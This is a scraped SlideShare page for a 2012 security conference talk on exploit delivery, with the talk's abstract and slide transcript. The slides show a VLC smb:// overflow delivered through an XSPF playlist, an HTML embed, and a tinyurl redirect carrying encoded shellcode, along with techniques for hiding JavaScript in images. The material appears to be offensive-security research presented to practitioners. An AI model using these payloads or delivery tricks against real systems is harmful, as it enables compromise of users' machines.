Your SlideShare is downloading. ×
0
Innovative Exploit Delivery
Innovative Exploit Delivery
Innovative Exploit Delivery
Innovative Exploit Delivery
Innovative Exploit Delivery
Innovative Exploit Delivery
Innovative Exploit Delivery
Innovative Exploit Delivery
Innovative Exploit Delivery
Innovative Exploit Delivery
Innovative Exploit Delivery
Innovative Exploit Delivery
Innovative Exploit Delivery
Innovative Exploit Delivery
Innovative Exploit Delivery
Innovative Exploit Delivery
Innovative Exploit Delivery
Innovative Exploit Delivery
Innovative Exploit Delivery
Innovative Exploit Delivery
Innovative Exploit Delivery
Innovative Exploit Delivery
Innovative Exploit Delivery
Innovative Exploit Delivery
Innovative Exploit Delivery
Innovative Exploit Delivery
Innovative Exploit Delivery
Innovative Exploit Delivery
Innovative Exploit Delivery
Innovative Exploit Delivery
Innovative Exploit Delivery
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Innovative Exploit Delivery

2,386

Published on

Behind every successful exploit is a good delivery mechanism. This talk combines my research in exploit writing, browser and PDF exploitation, web hacking and old school data representation …

Behind every successful exploit is a good delivery mechanism. This talk combines my research in exploit writing, browser and PDF exploitation, web hacking and old school data representation techniques, bringing you a slew of creative and innovative tricks and techniques to send exploits successfully to the victim's doorstep.

Never before has the fine art of packaging been more important when it comes to exploit delivery. Advances in HTML standards, newer trends with HTTP, new techniques of consuming web resources and multiple ways of data representation make it possible to come up with tricks like "Javascript chameleons", "shortened exploits", "exploitation by painting" and other creative techniques.

Published in: Technology
1 Comment
2 Likes
Statistics
Notes
  • Yeah, but can you exploit it on latest Linux amd64 with all the new gcc patches, PIE, stack cookies, ASLR, heap protection, etc? No...
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
No Downloads
Views
Total Views
2,386
On Slideshare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
0
Comments
1
Likes
2
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. INNOVATIVE EXPLOIT DELIVERY SAUMIL SHAHnet-square HITB2012KUL
  • 2. # who am iSaumil Shah, CEO Net-Square.• Hacker, Speaker, Trainer, Author - 15 yrs in Infosec.• M.S. Computer Science Purdue University.• saumil@net-square.com• LinkedIn: saumilshah• Twitter: @therealsaumilnet-square
  • 3. My area of work Penetration Reverse Exploit Testing Engineering Writing New Offensive Attack Research Security Defense Conference "Eyes and Speaker ears open"net-square
  • 4. When two forces combine... Web Binary Hacking Exploitsnet-square
  • 5. SNEAKY LETHALnet-square
  • 6. net-square
  • 7. 302 IMG JS HTML5net-square
  • 8. net-square
  • 9. VLC smb overflow• smb://example.com@0.0.0.0/foo/#{AAAA AAAA....}• Classic Stack Overflow.net-square
  • 10. VLC XSPF file<?xml version="1.0" encoding="UTF-8"?><playlist version="1" xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/"> <title>Playlist</title> <trackList> <track> <location> smb://example.com@0.0.0.0/foo/#{AAAAAAAA....} </location> <extension application="http://www.videolan.org/vlc/playlist/0"> <vlc:id>0</vlc:id> </extension> </track> </trackList></playlist> net-square
  • 11. Alpha Encoded Tiny ZOMFG Exploit URLnet-square
  • 12. 100% Pure Alphanum!net-square
  • 13. VLC smb overflow - HTMLized!!<embed type="application/x-vlc-plugin" width="320" height="200" target="http://tinyurl.com/ycctrzf" id="vlc" /> net-square
  • 14. 301 Redirect from tinyurlHTTP/1.1 301 Moved PermanentlyX-Powered-By: PHP/5.2.12Location:smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAj4?wTYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJICVK1JjIoFoQRPRBJGrChJmDnElGuBzCDHoOHF4P0P0CgLKHzNOQeIzNOCEJGIoM7AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAT00WT00WWYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLIxCtGpC0GpLKQUGLNkQlFeD8GqHoLKPOEHLKCoQ0EQHkQYLKP4NkEQJNP1KpNyNLMTIPQdC7KqIZDMC1O2JKL4GKCdGTGtBUIuLKQOQ4EQHkPfLKDLBkLKCoGlEQJKLKGlLKEQHkOyClQ4GtJcEaIPBDNkG0P0MUIPCHDLLKG0FlNkPpGlNMNkE8GxHkEYLKOpH0EPC0EPLKQxGLQOEaJVQpCfOyHxOsIPCKBpCXHpLJC4QOPhJ8KNNjDNF7KOIwPcCQPlQsDnCUCHPeEPAA}Content-type: text/htmlContent-Length: 0Connection: closeServer: TinyURL/1.6 net-square
  • 15. net-square
  • 16. Exploits as Images - 1• Grayscale encoding (0-255).• 1 pixel = 1 character.• Perfectly valid image.• Decode and Execute!net-square
  • 17. net-square
  • 18. Im an evil Javascript Im an innocent imagenet-square
  • 19. <CANVAS>net-square
  • 20. net-square c) no eval()
  • 21. Same Same No Different! var a = eval(str); a = (new Function(str))();net-square
  • 22. d) IMAJSnet-square
  • 23. IMAJS Seeing is Believingnet-square
  • 24. Browser Support for IMAJS-GIFHeight Width Browser/Viewer Image Javascript Renders? Executes?2f 2a 00 00 Firefox yes yes2f 2a 00 00 Safari yes yes2f 2a 00 00 IE no yes2f 2a 00 00 Chrome yes yes2f 2a 00 00 Preview.app yes -2f 2a 00 00 XP Image Viewer no -2f 2a 00 00 Win 7 Preview yes -net-square
  • 25. Browser Support for IMAJS-BMPHeight Width Browser/Viewer Image Javascript Renders? Executes?2f 2a 00 00 Firefox yes yes2f 2a 00 00 Safari yes yes2f 2a 00 00 IE yes yes2f 2a 00 00 Chrome yes yes2f 2a 00 00 Opera yes yes2f 2a 00 00 Preview.app yes -2f 2a 00 00 XP Image Viewer yes -2f 2a 00 00 Win 7 Preview yes -net-square
  • 26. e) The αq exploitnet-square
  • 27. Encode using Alpha channelnet-square
  • 28. Demo IMAJS αq FTW!net-square
  • 29. f) ONE LAST DEMO!!! net-square
  • 30. The FUTURE? HTML5 Video SVG WebGL Mobile Browsersnet-square
  • 31. KTHXBAI See you in 2013??net-square saumil@net-square.com | @therealsaumil

×